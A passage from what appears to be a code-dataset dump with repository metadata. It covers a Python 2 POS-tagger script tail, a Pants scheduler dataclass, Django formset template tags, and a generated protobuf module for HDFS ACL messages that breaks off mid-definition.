            # NOTE(review): this prints None when -t1 was not given — looks
            # like leftover debug output; confirm before removing.
            if not args.top_x_form:
                print args.top_x_form
            top_x = [args.top_x_form, args.top_x_word_len, args.top_x_position, args.top_x_prefix, args.top_x_suffix,
                     args.top_x_lettercombs]
            t.train(args.in_file, args.model, int(args.epochs), top_x, args.decrease_alpha, args.shuffle_sentences,
                    args.batch_training)
        elif args.test:
            print "Running in test mode\n"
            t.test(args.in_file, args.model, args.output_file)
        elif args.evaluate:
            print "Running in evaluation mode\n"
            # evaluate() is a module-level function (not a posTagger method)
            # and writes its report to the output stream:
            out_stream = open(args.output_file, 'w')
            evaluate(args.in_file, out_stream)
            out_stream.close()
        elif args.tag:
            print "Running in tag mode\n"
            t.tag(args.in_file, args.model, args.output_file)
    t1 = time.time()
    print "\n\tDone. Total time: " + str(t1 - t0) + "sec.\n"
| 29,383 | -5 | 234 |
5f31560a74d5dfb63e7c3127102442b9295b9807 | 386 | py | Python | src/python/pants/init/bootstrap_scheduler.py | rcuza/pants | 0429258b181986eed856ae45af93b776727774a0 | [
"Apache-2.0"
] | 1,806 | 2015-01-05T07:31:00.000Z | 2022-03-31T11:35:41.000Z | src/python/pants/init/bootstrap_scheduler.py | rcuza/pants | 0429258b181986eed856ae45af93b776727774a0 | [
"Apache-2.0"
] | 9,565 | 2015-01-02T19:01:59.000Z | 2022-03-31T23:25:16.000Z | src/python/pants/init/bootstrap_scheduler.py | rcuza/pants | 0429258b181986eed856ae45af93b776727774a0 | [
"Apache-2.0"
] | 443 | 2015-01-06T20:17:57.000Z | 2022-03-31T05:28:17.000Z | # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from dataclasses import dataclass
from pants.engine.internals.scheduler import Scheduler
@dataclass(frozen=True)
class BootstrapScheduler:
"""A Scheduler that has been configured with only the rules for bootstrapping."""
scheduler: Scheduler
| 27.571429 | 85 | 0.784974 | # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from dataclasses import dataclass
from pants.engine.internals.scheduler import Scheduler
@dataclass(frozen=True)
class BootstrapScheduler:
"""A Scheduler that has been configured with only the rules for bootstrapping."""
scheduler: Scheduler
| 0 | 0 | 0 |
20f7b957862e865fca511976b35c043c5e91e60d | 756 | py | Python | django_bootstrap_dynamic_formsets/templatetags/bootstrap_dynamic_formsets.py | AHouy/django-bootstrap-dynamic-formsets | d8b99a43b185c0cdf3137ebc25d6ba13d5032644 | [
"MIT"
] | 23 | 2015-06-15T20:24:33.000Z | 2021-12-22T07:18:45.000Z | django_bootstrap_dynamic_formsets/templatetags/bootstrap_dynamic_formsets.py | AHouy/django-bootstrap-dynamic-formsets | d8b99a43b185c0cdf3137ebc25d6ba13d5032644 | [
"MIT"
] | 9 | 2015-06-16T18:11:16.000Z | 2018-04-04T15:45:08.000Z | django_bootstrap_dynamic_formsets/templatetags/bootstrap_dynamic_formsets.py | AHouy/django-bootstrap-dynamic-formsets | d8b99a43b185c0cdf3137ebc25d6ba13d5032644 | [
"MIT"
] | 19 | 2015-06-16T08:04:29.000Z | 2021-03-12T23:51:17.000Z | from django import template
from django.utils.html import format_html
register = template.Library()
@register.inclusion_tag('django_bootstrap_dynamic_formsets/dynamic_formsets.html')
@register.inclusion_tag('django_bootstrap_dynamic_formsets/dynamic_formsets_js.html',takes_context=True)
| 47.25 | 104 | 0.747354 | from django import template
from django.utils.html import format_html
register = template.Library()
@register.inclusion_tag('django_bootstrap_dynamic_formsets/dynamic_formsets.html')
def bootstrap_dynamic_formset(formset, can_order=False, can_delete=False,
form_wrapper="well", layout="", id_formset="id_form"):
return {"formset":formset, "can_order":can_order, "can_delete":can_delete,
"form_wrapper":form_wrapper, "layout":layout}
@register.inclusion_tag('django_bootstrap_dynamic_formsets/dynamic_formsets_js.html',takes_context=True)
def bootstrap_dynamic_formset_js(context):
return {'can_order':context['can_order'], 'can_delete':context['can_delete'],
'formset':context['formset']}
| 421 | 0 | 44 |
29b5f73253e00d865823d44734062de6df02df9d | 22,805 | py | Python | gen/acl_pb2.py | zizon/prpc | a075256eb55a31a535aa5e7fd0d00a78b3b44966 | [
"MIT"
] | null | null | null | gen/acl_pb2.py | zizon/prpc | a075256eb55a31a535aa5e7fd0d00a78b3b44966 | [
"MIT"
] | null | null | null | gen/acl_pb2.py | zizon/prpc | a075256eb55a31a535aa5e7fd0d00a78b3b44966 | [
"MIT"
] | null | null | null | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: acl.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
import hdfs_pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='acl.proto',
package='hadoop.hdfs',
serialized_pb='\n\tacl.proto\x12\x0bhadoop.hdfs\x1a\nhdfs.proto\"\xc4\x03\n\rAclEntryProto\x12:\n\x04type\x18\x01 \x02(\x0e\x32,.hadoop.hdfs.AclEntryProto.AclEntryTypeProto\x12<\n\x05scope\x18\x02 \x02(\x0e\x32-.hadoop.hdfs.AclEntryProto.AclEntryScopeProto\x12=\n\x0bpermissions\x18\x03 \x02(\x0e\x32(.hadoop.hdfs.AclEntryProto.FsActionProto\x12\x0c\n\x04name\x18\x04 \x01(\t\"-\n\x12\x41\x63lEntryScopeProto\x12\n\n\x06\x41\x43\x43\x45SS\x10\x00\x12\x0b\n\x07\x44\x45\x46\x41ULT\x10\x01\"=\n\x11\x41\x63lEntryTypeProto\x12\x08\n\x04USER\x10\x00\x12\t\n\x05GROUP\x10\x01\x12\x08\n\x04MASK\x10\x02\x12\t\n\x05OTHER\x10\x03\"~\n\rFsActionProto\x12\x08\n\x04NONE\x10\x00\x12\x0b\n\x07\x45XECUTE\x10\x01\x12\t\n\x05WRITE\x10\x02\x12\x11\n\rWRITE_EXECUTE\x10\x03\x12\x08\n\x04READ\x10\x04\x12\x10\n\x0cREAD_EXECUTE\x10\x05\x12\x0e\n\nREAD_WRITE\x10\x06\x12\x0c\n\x08PERM_ALL\x10\x07\"\x9f\x01\n\x0e\x41\x63lStatusProto\x12\r\n\x05owner\x18\x01 \x02(\t\x12\r\n\x05group\x18\x02 \x02(\t\x12\x0e\n\x06sticky\x18\x03 \x02(\x08\x12+\n\x07\x65ntries\x18\x04 \x03(\x0b\x32\x1a.hadoop.hdfs.AclEntryProto\x12\x32\n\npermission\x18\x05 \x01(\x0b\x32\x1e.hadoop.hdfs.FsPermissionProto\"X\n\x1cModifyAclEntriesRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\x12+\n\x07\x61\x63lSpec\x18\x02 \x03(\x0b\x32\x1a.hadoop.hdfs.AclEntryProto\"\x1f\n\x1dModifyAclEntriesResponseProto\"$\n\x15RemoveAclRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\"\x18\n\x16RemoveAclResponseProto\"X\n\x1cRemoveAclEntriesRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\x12+\n\x07\x61\x63lSpec\x18\x02 \x03(\x0b\x32\x1a.hadoop.hdfs.AclEntryProto\"\x1f\n\x1dRemoveAclEntriesResponseProto\"+\n\x1cRemoveDefaultAclRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\"\x1f\n\x1dRemoveDefaultAclResponseProto\"N\n\x12SetAclRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\x12+\n\x07\x61\x63lSpec\x18\x02 \x03(\x0b\x32\x1a.hadoop.hdfs.AclEntryProto\"\x15\n\x13SetAclResponseProto\"\'\n\x18GetAclStatusRequestProto\x12\x0b\n\x03src\x18\x01 
\x02(\t\"H\n\x19GetAclStatusResponseProto\x12+\n\x06result\x18\x01 \x02(\x0b\x32\x1b.hadoop.hdfs.AclStatusProtoB5\n%org.apache.hadoop.hdfs.protocol.protoB\tAclProtos\xa0\x01\x01')
_ACLENTRYPROTO_ACLENTRYSCOPEPROTO = _descriptor.EnumDescriptor(
name='AclEntryScopeProto',
full_name='hadoop.hdfs.AclEntryProto.AclEntryScopeProto',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='ACCESS', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DEFAULT', index=1, number=1,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=255,
serialized_end=300,
)
_ACLENTRYPROTO_ACLENTRYTYPEPROTO = _descriptor.EnumDescriptor(
name='AclEntryTypeProto',
full_name='hadoop.hdfs.AclEntryProto.AclEntryTypeProto',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='USER', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GROUP', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MASK', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='OTHER', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=302,
serialized_end=363,
)
_ACLENTRYPROTO_FSACTIONPROTO = _descriptor.EnumDescriptor(
name='FsActionProto',
full_name='hadoop.hdfs.AclEntryProto.FsActionProto',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='NONE', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EXECUTE', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRITE', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRITE_EXECUTE', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_EXECUTE', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_WRITE', index=6, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PERM_ALL', index=7, number=7,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=365,
serialized_end=491,
)
_ACLENTRYPROTO = _descriptor.Descriptor(
name='AclEntryProto',
full_name='hadoop.hdfs.AclEntryProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='hadoop.hdfs.AclEntryProto.type', index=0,
number=1, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='scope', full_name='hadoop.hdfs.AclEntryProto.scope', index=1,
number=2, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='permissions', full_name='hadoop.hdfs.AclEntryProto.permissions', index=2,
number=3, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='hadoop.hdfs.AclEntryProto.name', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_ACLENTRYPROTO_ACLENTRYSCOPEPROTO,
_ACLENTRYPROTO_ACLENTRYTYPEPROTO,
_ACLENTRYPROTO_FSACTIONPROTO,
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=39,
serialized_end=491,
)
_ACLSTATUSPROTO = _descriptor.Descriptor(
name='AclStatusProto',
full_name='hadoop.hdfs.AclStatusProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='owner', full_name='hadoop.hdfs.AclStatusProto.owner', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='group', full_name='hadoop.hdfs.AclStatusProto.group', index=1,
number=2, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sticky', full_name='hadoop.hdfs.AclStatusProto.sticky', index=2,
number=3, type=8, cpp_type=7, label=2,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='entries', full_name='hadoop.hdfs.AclStatusProto.entries', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='permission', full_name='hadoop.hdfs.AclStatusProto.permission', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=494,
serialized_end=653,
)
_MODIFYACLENTRIESREQUESTPROTO = _descriptor.Descriptor(
name='ModifyAclEntriesRequestProto',
full_name='hadoop.hdfs.ModifyAclEntriesRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.ModifyAclEntriesRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='aclSpec', full_name='hadoop.hdfs.ModifyAclEntriesRequestProto.aclSpec', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=655,
serialized_end=743,
)
_MODIFYACLENTRIESRESPONSEPROTO = _descriptor.Descriptor(
name='ModifyAclEntriesResponseProto',
full_name='hadoop.hdfs.ModifyAclEntriesResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=745,
serialized_end=776,
)
_REMOVEACLREQUESTPROTO = _descriptor.Descriptor(
name='RemoveAclRequestProto',
full_name='hadoop.hdfs.RemoveAclRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.RemoveAclRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=778,
serialized_end=814,
)
_REMOVEACLRESPONSEPROTO = _descriptor.Descriptor(
name='RemoveAclResponseProto',
full_name='hadoop.hdfs.RemoveAclResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=816,
serialized_end=840,
)
_REMOVEACLENTRIESREQUESTPROTO = _descriptor.Descriptor(
name='RemoveAclEntriesRequestProto',
full_name='hadoop.hdfs.RemoveAclEntriesRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.RemoveAclEntriesRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='aclSpec', full_name='hadoop.hdfs.RemoveAclEntriesRequestProto.aclSpec', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=842,
serialized_end=930,
)
_REMOVEACLENTRIESRESPONSEPROTO = _descriptor.Descriptor(
name='RemoveAclEntriesResponseProto',
full_name='hadoop.hdfs.RemoveAclEntriesResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=932,
serialized_end=963,
)
_REMOVEDEFAULTACLREQUESTPROTO = _descriptor.Descriptor(
name='RemoveDefaultAclRequestProto',
full_name='hadoop.hdfs.RemoveDefaultAclRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.RemoveDefaultAclRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=965,
serialized_end=1008,
)
_REMOVEDEFAULTACLRESPONSEPROTO = _descriptor.Descriptor(
name='RemoveDefaultAclResponseProto',
full_name='hadoop.hdfs.RemoveDefaultAclResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1010,
serialized_end=1041,
)
_SETACLREQUESTPROTO = _descriptor.Descriptor(
name='SetAclRequestProto',
full_name='hadoop.hdfs.SetAclRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.SetAclRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='aclSpec', full_name='hadoop.hdfs.SetAclRequestProto.aclSpec', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1043,
serialized_end=1121,
)
_SETACLRESPONSEPROTO = _descriptor.Descriptor(
name='SetAclResponseProto',
full_name='hadoop.hdfs.SetAclResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1123,
serialized_end=1144,
)
_GETACLSTATUSREQUESTPROTO = _descriptor.Descriptor(
name='GetAclStatusRequestProto',
full_name='hadoop.hdfs.GetAclStatusRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.GetAclStatusRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1146,
serialized_end=1185,
)
_GETACLSTATUSRESPONSEPROTO = _descriptor.Descriptor(
name='GetAclStatusResponseProto',
full_name='hadoop.hdfs.GetAclStatusResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='result', full_name='hadoop.hdfs.GetAclStatusResponseProto.result', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1187,
serialized_end=1259,
)
_ACLENTRYPROTO.fields_by_name['type'].enum_type = _ACLENTRYPROTO_ACLENTRYTYPEPROTO
_ACLENTRYPROTO.fields_by_name['scope'].enum_type = _ACLENTRYPROTO_ACLENTRYSCOPEPROTO
_ACLENTRYPROTO.fields_by_name['permissions'].enum_type = _ACLENTRYPROTO_FSACTIONPROTO
_ACLENTRYPROTO_ACLENTRYSCOPEPROTO.containing_type = _ACLENTRYPROTO;
_ACLENTRYPROTO_ACLENTRYTYPEPROTO.containing_type = _ACLENTRYPROTO;
_ACLENTRYPROTO_FSACTIONPROTO.containing_type = _ACLENTRYPROTO;
_ACLSTATUSPROTO.fields_by_name['entries'].message_type = _ACLENTRYPROTO
_ACLSTATUSPROTO.fields_by_name['permission'].message_type = hdfs_pb2._FSPERMISSIONPROTO
_MODIFYACLENTRIESREQUESTPROTO.fields_by_name['aclSpec'].message_type = _ACLENTRYPROTO
_REMOVEACLENTRIESREQUESTPROTO.fields_by_name['aclSpec'].message_type = _ACLENTRYPROTO
_SETACLREQUESTPROTO.fields_by_name['aclSpec'].message_type = _ACLENTRYPROTO
_GETACLSTATUSRESPONSEPROTO.fields_by_name['result'].message_type = _ACLSTATUSPROTO
DESCRIPTOR.message_types_by_name['AclEntryProto'] = _ACLENTRYPROTO
DESCRIPTOR.message_types_by_name['AclStatusProto'] = _ACLSTATUSPROTO
DESCRIPTOR.message_types_by_name['ModifyAclEntriesRequestProto'] = _MODIFYACLENTRIESREQUESTPROTO
DESCRIPTOR.message_types_by_name['ModifyAclEntriesResponseProto'] = _MODIFYACLENTRIESRESPONSEPROTO
DESCRIPTOR.message_types_by_name['RemoveAclRequestProto'] = _REMOVEACLREQUESTPROTO
DESCRIPTOR.message_types_by_name['RemoveAclResponseProto'] = _REMOVEACLRESPONSEPROTO
DESCRIPTOR.message_types_by_name['RemoveAclEntriesRequestProto'] = _REMOVEACLENTRIESREQUESTPROTO
DESCRIPTOR.message_types_by_name['RemoveAclEntriesResponseProto'] = _REMOVEACLENTRIESRESPONSEPROTO
DESCRIPTOR.message_types_by_name['RemoveDefaultAclRequestProto'] = _REMOVEDEFAULTACLREQUESTPROTO
DESCRIPTOR.message_types_by_name['RemoveDefaultAclResponseProto'] = _REMOVEDEFAULTACLRESPONSEPROTO
DESCRIPTOR.message_types_by_name['SetAclRequestProto'] = _SETACLREQUESTPROTO
DESCRIPTOR.message_types_by_name['SetAclResponseProto'] = _SETACLRESPONSEPROTO
DESCRIPTOR.message_types_by_name['GetAclStatusRequestProto'] = _GETACLSTATUSREQUESTPROTO
DESCRIPTOR.message_types_by_name['GetAclStatusResponseProto'] = _GETACLSTATUSRESPONSEPROTO
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), '\n%org.apache.hadoop.hdfs.protocol.protoB\tAclProtos\240\001\001')
# @@protoc_insertion_point(module_scope)
| 34.500756 | 2,158 | 0.75979 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: acl.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
import hdfs_pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='acl.proto',
package='hadoop.hdfs',
serialized_pb='\n\tacl.proto\x12\x0bhadoop.hdfs\x1a\nhdfs.proto\"\xc4\x03\n\rAclEntryProto\x12:\n\x04type\x18\x01 \x02(\x0e\x32,.hadoop.hdfs.AclEntryProto.AclEntryTypeProto\x12<\n\x05scope\x18\x02 \x02(\x0e\x32-.hadoop.hdfs.AclEntryProto.AclEntryScopeProto\x12=\n\x0bpermissions\x18\x03 \x02(\x0e\x32(.hadoop.hdfs.AclEntryProto.FsActionProto\x12\x0c\n\x04name\x18\x04 \x01(\t\"-\n\x12\x41\x63lEntryScopeProto\x12\n\n\x06\x41\x43\x43\x45SS\x10\x00\x12\x0b\n\x07\x44\x45\x46\x41ULT\x10\x01\"=\n\x11\x41\x63lEntryTypeProto\x12\x08\n\x04USER\x10\x00\x12\t\n\x05GROUP\x10\x01\x12\x08\n\x04MASK\x10\x02\x12\t\n\x05OTHER\x10\x03\"~\n\rFsActionProto\x12\x08\n\x04NONE\x10\x00\x12\x0b\n\x07\x45XECUTE\x10\x01\x12\t\n\x05WRITE\x10\x02\x12\x11\n\rWRITE_EXECUTE\x10\x03\x12\x08\n\x04READ\x10\x04\x12\x10\n\x0cREAD_EXECUTE\x10\x05\x12\x0e\n\nREAD_WRITE\x10\x06\x12\x0c\n\x08PERM_ALL\x10\x07\"\x9f\x01\n\x0e\x41\x63lStatusProto\x12\r\n\x05owner\x18\x01 \x02(\t\x12\r\n\x05group\x18\x02 \x02(\t\x12\x0e\n\x06sticky\x18\x03 \x02(\x08\x12+\n\x07\x65ntries\x18\x04 \x03(\x0b\x32\x1a.hadoop.hdfs.AclEntryProto\x12\x32\n\npermission\x18\x05 \x01(\x0b\x32\x1e.hadoop.hdfs.FsPermissionProto\"X\n\x1cModifyAclEntriesRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\x12+\n\x07\x61\x63lSpec\x18\x02 \x03(\x0b\x32\x1a.hadoop.hdfs.AclEntryProto\"\x1f\n\x1dModifyAclEntriesResponseProto\"$\n\x15RemoveAclRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\"\x18\n\x16RemoveAclResponseProto\"X\n\x1cRemoveAclEntriesRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\x12+\n\x07\x61\x63lSpec\x18\x02 \x03(\x0b\x32\x1a.hadoop.hdfs.AclEntryProto\"\x1f\n\x1dRemoveAclEntriesResponseProto\"+\n\x1cRemoveDefaultAclRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\"\x1f\n\x1dRemoveDefaultAclResponseProto\"N\n\x12SetAclRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\x12+\n\x07\x61\x63lSpec\x18\x02 \x03(\x0b\x32\x1a.hadoop.hdfs.AclEntryProto\"\x15\n\x13SetAclResponseProto\"\'\n\x18GetAclStatusRequestProto\x12\x0b\n\x03src\x18\x01 
\x02(\t\"H\n\x19GetAclStatusResponseProto\x12+\n\x06result\x18\x01 \x02(\x0b\x32\x1b.hadoop.hdfs.AclStatusProtoB5\n%org.apache.hadoop.hdfs.protocol.protoB\tAclProtos\xa0\x01\x01')
_ACLENTRYPROTO_ACLENTRYSCOPEPROTO = _descriptor.EnumDescriptor(
name='AclEntryScopeProto',
full_name='hadoop.hdfs.AclEntryProto.AclEntryScopeProto',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='ACCESS', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DEFAULT', index=1, number=1,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=255,
serialized_end=300,
)
_ACLENTRYPROTO_ACLENTRYTYPEPROTO = _descriptor.EnumDescriptor(
name='AclEntryTypeProto',
full_name='hadoop.hdfs.AclEntryProto.AclEntryTypeProto',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='USER', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GROUP', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MASK', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='OTHER', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=302,
serialized_end=363,
)
_ACLENTRYPROTO_FSACTIONPROTO = _descriptor.EnumDescriptor(
name='FsActionProto',
full_name='hadoop.hdfs.AclEntryProto.FsActionProto',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='NONE', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EXECUTE', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRITE', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRITE_EXECUTE', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_EXECUTE', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_WRITE', index=6, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PERM_ALL', index=7, number=7,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=365,
serialized_end=491,
)
_ACLENTRYPROTO = _descriptor.Descriptor(
name='AclEntryProto',
full_name='hadoop.hdfs.AclEntryProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='hadoop.hdfs.AclEntryProto.type', index=0,
number=1, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='scope', full_name='hadoop.hdfs.AclEntryProto.scope', index=1,
number=2, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
